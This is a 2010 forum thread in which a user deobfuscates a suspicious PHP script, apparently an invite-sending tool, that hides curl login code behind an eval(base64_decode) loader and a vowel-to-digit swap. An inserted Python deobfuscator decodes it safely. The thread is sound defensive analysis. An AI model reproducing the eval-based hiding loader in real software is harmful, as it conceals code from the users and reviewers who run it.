dzhax Posted January 19, 2010

I found a script I want to use, but it entails entering account information for a site. So obviously I am going to look through it and make sure it's not a phishing attempt on my info. While I was doing this I found this $_X=''; and what appears to be a base64 encoded string. So I base64 decoded it and it doesn't look right still...

The code in the script:

if(isset($_GET['e'])) { $_F=__FILE__; $_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==')); $result = sendInvite($_GET['e']);

My attempt to decode:

<? echo base64_decode("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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="); ?>

My Result:

?> "2n", "h1ndl5" => L_LOGIN, "p1ssw2rd" => L_PASSWORD, );
$c22k45_f4l5_p1th = "c22k45.txt";
$ch = c3rl_4n4t();
c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6);
c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl);
c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt);
c3rl_s5t2pt($ch, CURLOPT_HEADER, 6);
c3rl_s5t2pt($ch, CURLOPT_POST, tr35);
c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t);
c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6);
c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6);
c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0);
c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r);
c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th);
c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th);
$r5s3lt = c3rl_5x5c($ch);
3ns5t($ch);
4f(strstr($r5s3lt, "S4gn23t") == FALSE){ r5t3rn "d2wn"; }
$p2st3rl = "http://www.l2ck5rz.c2m/4nv4t1t42n/s5nd_5m14l_4nv4t5s";
$r5f5rr5r = "http://www.l2ck5rz.c2m/c2nn5ct";
$p2st4t = 1rr1y("5m14ls" => "$5m14ls", "m5ss1g5" => L_MESSAGE );
$ch = c3rl_4n4t();
c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6);
c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl);
c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt);
c3rl_s5t2pt($ch, CURLOPT_HEADER, 6);
c3rl_s5t2pt($ch, CURLOPT_POST, 6);
c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t);
c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6);
c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6);
c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0);
c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r);
c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th);
c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th);
$r5s3lt = c3rl_5x5c($ch);
3ns5t($ch);
4f(strstr($r5s3lt, "s3cc5ss") == TRUE){
$myF4l5 = "c23nt.txt";
$fh = f2p5n($myF4l5, 'w') 2r d45("C1n't 2p5n c23nt.txt");
$c23nt++;
$str4ngD1t1 = $c23nt;
fwr4t5($fh, $str4ngD1t1) 2r d45("C1n't 3pd1t5 c23nt.txt");
fcl2s5($fh);
r5t3rn "s5nt";
} 5ls5 { r5t3rn "1lr51dy"; } } }
?>¯jVÚ±î¸uç(uâEõƒÖ&6ScEöFV6öFR‚Eõ‚“²Eõƒ×7G'G"‚Eõ‚Âs#3CSf÷V–RrÂv÷V–S#3CSbr“²Eõ#ÖW&Vu÷&WÆ6R‚uõôd”ÄUõòrÂ"r"âEôbâ"r"ÂEõ‚“¶Wf‚Eõ"“²Eõ#Ó²EõƒÓ°

The majority of it is readable but the very end and what appears to be random number replacement.... I didn't even see anywhere in the script that is decoding... Any help appreciated.

EDIT: On second thought, after looking at my post just now I noticed a decode at the end of that long line... let's see what that says :)

OK, found out that that last line of gibberish was a decode statement tacked on the end of the line:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
justsomeguy Posted January 19, 2010

What exactly are you looking for help with?

It looks like just character replacement. You can see here:

p1ssw2rd

that 1=a and 2=o. So you could substitute that in here:

c22k45_f4l5_p1th

to get:

cook45_f4l5_path

I'm going to guess that 4=i and 5=e, to give "cookie_file_path".

I know that this is curl_init:

$ch = c3rl_4n4t();

So then 3=u. So apparently they replaced the vowels with 1-5. You can go through that code and replace everything yourself if you want to see it. There's a second eval on the bottom of what you decoded, make sure you echo that also.
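As an added example (not code from the thread or from the script being discussed), here is a Python deobfuscator that replays the loader's steps statically, so the hidden payload can be read without ever handing it to PHP's eval(). The loader base64 blob is the one quoted in the thread; the $_X payload sample is constructed here because the page does not reproduce the real one, and the file_path default is a placeholder.

```python
import base64
import re

# strtr($_X, '123456aouie', 'aouie123456') is a simultaneous one-character swap,
# which str.translate reproduces exactly; ENCODE_TABLE is the inverse the author used.
DECODE_TABLE = str.maketrans("123456aouie", "aouie123456")
ENCODE_TABLE = str.maketrans("aouie123456", "123456aouie")

# The eval(base64_decode('...')) wrapper the thread's loader hides its bootstrap in.
EVAL_B64 = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")

def decode_loader(source):
    """Plaintext of every eval(base64_decode('...')) in source, decoded
    statically instead of by letting PHP run eval()."""
    return [base64.b64decode(m.group(1)).decode("latin-1")
            for m in EVAL_B64.finditer(source)]

def unswap_vowels(text):
    """The strtr step alone: c22k45_f4l5_p1th -> cookie_file_path."""
    return text.translate(DECODE_TABLE)

def decode_payload(source, file_path="<script path>"):
    """Pull $_X out of a script shaped like the thread's and replay what the
    loader does to it, minus the final eval($_R): base64_decode, the strtr
    swap, then ereg_replace('__FILE__', "'".$_F."'", $_X)."""
    x_blob = re.search(r"\$_X='([^']*)'", source).group(1)
    raw = base64.b64decode(x_blob).decode("latin-1")
    return unswap_vowels(raw).replace("__FILE__", "'" + file_path + "'")

def encode_payload(plain):
    # Inverse transform; used only to build the constructed sample below.
    return base64.b64encode(plain.translate(ENCODE_TABLE).encode("latin-1")).decode()

# Loader blob copied from the script quoted in the thread (the second eval on the line).
LOADER_B64 = ("JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7"
              "JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==")

# Constructed $_X sample: the page does not reproduce the real payload blob.
SAMPLE_PLAIN = ('$cookie_file_path = "cookie.txt"; $ch = curl_init(); '
                'curl_setopt($ch, CURLOPT_VERBOSE, 1); '
                'if(strstr($result, "Signout") == FALSE){ return "down"; }')
SAMPLE_SCRIPT = ("$_F=__FILE__; $_X='" + encode_payload(SAMPLE_PLAIN) + "';"
                 "eval(base64_decode('" + LOADER_B64 + "'));")

if __name__ == "__main__":
    print("loader :", decode_loader(SAMPLE_SCRIPT)[0])
    print("payload:", decode_payload(SAMPLE_SCRIPT))
```

Decoding this way also makes the `6` for `1` swap visible (CURLOPT_VERBOSE, 6 is really 1, and i0 is 50), which a vowels-only substitution would miss.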
dzhax Posted January 19, 2010 Author

Yea I just figured that out... It was that decode at the end I didn't see. I got it working now. Thanks for your help anyway